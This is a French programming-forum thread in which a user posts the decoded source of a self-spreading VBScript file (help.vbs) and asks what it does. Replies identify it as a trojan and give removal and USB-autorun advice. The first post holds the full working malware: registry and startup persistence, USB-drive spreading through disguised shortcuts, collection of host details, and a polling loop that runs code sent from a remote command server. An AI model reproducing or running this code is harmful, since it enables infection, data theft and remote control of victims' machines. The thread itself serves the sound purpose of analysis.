Besoin d'aide pour comprendre du code (vbs??) (Help.vbs = virus ??? ) [Résolu]

Messages postés
6
Date d'inscription
lundi 23 février 2009
Dernière intervention
9 juin 2013
- - Dernière réponse : NHenry
Messages postés
14323
Date d'inscription
vendredi 14 mars 2003
Dernière intervention
15 décembre 2018
- 9 juin 2013 à 23:22
bonjour a tous !

Alors voila -_- je suis tombé sur un fichier "help.vbs" qui c'est mis a se dupliquer étrangement..
après édition du fichier, le code était vraiment étrange.. une succession de chiffre avec 3 ligne de vbs a la fin

j'ai fais une petite page wep pour décrypter ces chiffres (conversion CHR).. qui m'ont donné une autre suite de chiffre que j'ai decrypté a leur tour..
et cela ma donné ca !!

On Error Resume Next:diM sh:set sh=WScript.createObject("WScript.Shell"):diM fs:set fs=CreatEObjeCt("Scripting.FileSystemObject"):dim hosT:host="google-plus.redirectme.net":Dim port:port=90:Dim DR:DR=sh.ExPandenviRonmenTStrings("%temp%")&"":dim FN:FN="help.vbs":dim Fh:dim uS:Us="~":ins:dim spl:spl="jnJnj":Dim i:i=0:WhiLe true:dim a:a=sPliT(post("ready",""),spl):select case a(0):case"exc":dIm sa:Sa=a(1):execUTe sa:caSe"uns":Uns:end select:wScript.slEep 4000:i=i+1:if i>2 then i=0:xins:eNd if:wenD:function Ins:on error rEsume next:us=Sh.regread("HKCU\updatee"):If us="~"then if lcAse(miD(wscRipt.scriptfullname,2))=":"&lcasE(fn)tHen uS="y":sh.RegwRiTe"HKCU\updatee",us,"REG_SZ":ElsE uS="n":SH.regwrite"HKCU\updatee",us,"REG_SZ":end if:eNd if:ERr.Clear:fs.CopyFiLe wSCript.scripTfullnAmE,dR&fn,true:Set fh=Fs.OpenTeXTFIle(Dr&fN,8,false):if Err.Number>0 THeN wscript.QUit:end if:xIns:end funCtioN:sub xins:on erRor reSume next:sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn,chrw(34)&dr&fn&chrw(34),"REG_SZ":sh.regWrIte"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&fn,cHrW(34)&dr&fn&chrw(34),"REG_SZ":fS.CopYfile WsCrIpt.scriptfullnaMe,CreAteObject("Shell.Application").NAmeSPace(&H7).Self.Path&""&fn,true:foR eacH xx iN fs.drives:if xx.isready then if xx.FreeSpAce>0 theN if xX.drivEtypE=1 thEn if Fs.fileexists(xx.patH&""&fn)then fs.getfile(Xx.path&""&fn).AtTribuTes=0:enD If:fs.coPYfile dr&fn,xX.patH&""&fn,TruE:For EacH x In fs.GETFolder(xx.pAth&"").Files:wScript.sLeep 1:If instr(x.namE,".")then if lcase(SplIt(x.naMe,".")(uBoUnd(sPlit(x.nAme,"."))))<>"lnk"then x.ATtribuTes=2:if ucase(x.namE)<>ucasE(Fn)then With Sh.createSHORtcut(xx.patH&""&x.name&".lnk"):.TarGetPath="cmd.exe":.WorKIngDIrectoRY="":.ArgumenTS="/c start "&Replace(Fn," ",ChrW(34)&" "&ChrW(34))&"&start "&replACE(X.name," ",ChrW(34)&" "&ChRW(34))&" & exit":.IconLocation=sh.regreaD("HKLM\SOFTWARE\Classes"&sh.rEgrEad("HKLM\SOFTWARE\Classes\."&split(x.name,".")(UBound(SpLit(x.name,".")))&"")&"\DefaultIcon"):if inStr(.icOnlOCation,",")=0 then.iconlocaTion=.iConlocation&",0":eNd if:.SAve():end with:end if:end if:end if:Next:eNd if:end If:enD iF:Next:err.CLear:end sub:FuNction uns:ON error resuMe Next:fh.cLosE:Sh.RegDeletE"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn:Sh.REgDEleTe"HKLM\Software\Microsoft\Windows\CurrentVersion\Run"&Fn:fs.DEleTeFile dr&Fn,true:fs.DelEteFile CReatEOBject("Shell.Application").NameSpAcE(&H7).Self.PAth&""&Fn,true:for eacH xx in fs.Drives:if xx.IsrEAdy theN if XX.FReESpace>0 then for EacH X in fs.GeTFolder(xx.pAth&"").Files:On ERror ReSume nexT:if insTr(x.name,".")then if lcasE(spLit(x.Name,".")(UBound(SpliT(x.Name,"."))))<>"lnk"then x.AttrIbutes=0:if UCase(X.nAme)<>ucase(fN)then fs.deLetefIle(xx.Path&""&x.name&".lnk"):else fs.deletefile(Xx.path&""&x.Name):eND iF:end iF:enD if:NExT:end if:enD if:nExt:wscript.quit:enD fuNction:funcTion post(cmd,da):pOst="":dim o:Set o=CreateobjecT("MSXML2.XMLHTTP"):o.open"POST","http://"& HoSt&":"&Port&"/"&cmd,faLse:o.sEtrequestHeader"User-Agent:",inf:o.send da:posT=o.responSETExT:end fUnctiOn:diM Xinf:function inf:On errOr resuMe next:if xinf=""tHeN dim s:s="??":S=Hwd:inf=Inf&s&"":s="??":S=sh.expaNdENvironmEntstrIngS("%COMPUTERNAME%"):inf=inf&S&"":s="??":s=sh.EXpandENviRonMentstRings("%USERNAME%"):Inf=inf&s&"":s="??":Set a=geTObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):Set aA=a.ExEcQuery("Select * from Win32_OperatingSystem"):For Each Aaa iN aa:S=aaa.CapTion:exit foR:Next:inf=inf&s&"\\0.3"&uS&""&pid:xInf=inf:elsE inf=xinf:end If:end funCTioN:funCtIon HwD:HwD="key8_??":On Error REsumE Next:Set a=gEtObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2"):Set aa=a.Execquery("SELECT * FROM Win32_LogicalDisk"):For Each aaa in aa:iF aaa.VolUmeSerialnumber<>""then HWD="key8_"&aAa.VolumeseriaLNumber:exIt foR:end IF:NexT:enD funCtion:FunctiOn PiD:PID=0:on erroR resume nEXt:PID=getOBJect("winmgmts:root\cimv2").GEt("Win32_Process.Handle='"&sh.Exec("update.exe").ProCessID&"'").ParenTProcEssid:EnD Function


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'


'
'*******************************************************
'
' '*******************************************************
'

Je ne connais pas assez le vbs pour comprendre tout le code..
Alors je fais appel a ceux qui auront les connaissances ^^'

si quelqu'un est assez calé pour me dire exactement ce que cela fait svp !!!

pour ce que j'ai compris et isolé ca doit transmettre le num de serie de windows a l'url "google-plus. redirectme. net"
et ca modifie la clef registre
- HKLM\Software\Microsoft\Windows\CurrentVersion\Run\

mais pour le reste ??
neeed help pls !!
Afficher la suite 

Votre réponse

6 réponses

Meilleure réponse
Messages postés
14323
Date d'inscription
vendredi 14 mars 2003
Dernière intervention
15 décembre 2018
3
Merci
Bonjour,

sh.regwrite"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"&fn

Oui, ça fait penser à un virus.

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site

Dire « Merci » 3

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

Codes Sources 99 internautes nous ont dit merci ce mois-ci

Commenter la réponse de NHenry
Messages postés
18039
Date d'inscription
lundi 7 décembre 2009
Statut
Contributeur
Dernière intervention
11 avril 2018
3
Merci
Bonjour,
Bon ===>>
Voilà voilà
Certains commenceront à comprendre pourquoi d'autres (dont moi) on inhibé l'exécution de scripts (dont VBS) sur leur machine .
Bien sûr (pour les développeurs sous VB5, VB6 et VBA) : il faut faire harakiri de certaines facilités (FSO en premier lieu et loin devant) et apprendre à développer autrement.
________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.

Dire « Merci » 3

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

Codes Sources 99 internautes nous ont dit merci ce mois-ci

Commenter la réponse de ucfoutu
3
Merci
Bonjour,

foR eacH xx iN fs.drives ==>> Pour chaque disque/partition;
if xx.isready then if xx.FreeSpAce>0 theN ==>> si le lecteur est prêt et son espace libre est supérieur à zéro;

Pas bon du tout... même supprimé je suis sur qu'il va se régénérer.

Conseil: installe un antivirus.

Cordialement


CF2i - Guadeloupe
Ingénierie Informatique

Dire « Merci » 3

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

Codes Sources 99 internautes nous ont dit merci ce mois-ci

Commenter la réponse de Utilisateur anonyme
Messages postés
18039
Date d'inscription
lundi 7 décembre 2009
Statut
Contributeur
Dernière intervention
11 avril 2018
3
Merci
Va maintenant te falloir te débarrasser de cette "saloperie", signée Trojan.VBS.TWW ===>>
1) rien à voir, ni avec VB.Net, ni avec le développement. Consulte donc des sites spécialisés/lutte antivirus et autres bébêtes
2) tu n'as pas attrapé ce pou par hasard, mais : soit en téléchargeant "les yeux fermés" n'importe quoi, soit en échangeant des fichiers "entre copains". Au passage : contagion facilitée grandement par échange de fichiers Office (Excel, Word, etc ...).
Et la plupart du temps : à l'insu même de ceux avec lesquels tu as "généreusement échangé".
Va falloir commencer à mettre un terme à ces échanges-là
Bonne chance.

________________________
Réponse exacte ? => "REPONSE ACCEPTEE" facilitera les recherches.
Pas d'aide en ligne installée ? => ne comptez pas sur moi pour simplement répéter son contenu. Je n'interviendrai que si nécessité de la compléter.

Dire « Merci » 3

Quelques mots de remerciements seront grandement appréciés. Ajouter un commentaire

Codes Sources 99 internautes nous ont dit merci ce mois-ci

Commenter la réponse de ucfoutu
Messages postés
6
Date d'inscription
lundi 23 février 2009
Dernière intervention
9 juin 2013
0
Merci
Merci bcp pour vos reponses !!

@ucfoutu: effectivement recup apres avoir connecter une clef usb que j'avais utilisé pour depanné un pc.. et j'ai un antivirus.. avast.. enfin je croyais que c’était un antivirus -_-.. maintenant je doute..
Commenter la réponse de Tanahe
Messages postés
14323
Date d'inscription
vendredi 14 mars 2003
Dernière intervention
15 décembre 2018
0
Merci
Bonjour,

Règle de base, TOUJOURS désactiver les autoruns des clés USB (option de l'AV ou configuration du registre Windows), c'est une base de la sécurité, avec un peu de config, j'ai évité un paquet de ces merdes.
(Note, Norton et Avira le permettent le base).

v----Signature--------v----------------------------------------------
[list=ordered][*]Pour poser correctement une question et optimiser vos chances d'obtenir des réponses, pensez à lire le règlement CS, celui-ci pour bien poser votre question ou encore celui-ci pour les PFE et autres exercices.[*]Quand vous postez un code, merci d'utiliser la coloration syntaxique (3ième icône en partant de la droite : ).[*]En VB.NET pensez à activer Option Explicit et Option Strict (propriété du projet) et à retirer l'import automatique de l'espace de nom Microsoft.VisualBasic (onglet Références dans les propriétés du projet).[*]Si votre problème est résolu (et uniquement si c'est le cas), pensez à mettre "Réponse acceptée" sur le ou les messages qui vous ont aidés/list
---
Mon site
Commenter la réponse de NHenry

Vous n'êtes pas encore membre ?

inscrivez-vous, c'est gratuit et ça prend moins d'une minute !

Les membres obtiennent plus de réponses que les utilisateurs anonymes.

Le fait d'être membre vous permet d'avoir un suivi détaillé de vos demandes et codes sources.

Le fait d'être membre vous permet d'avoir des options supplémentaires.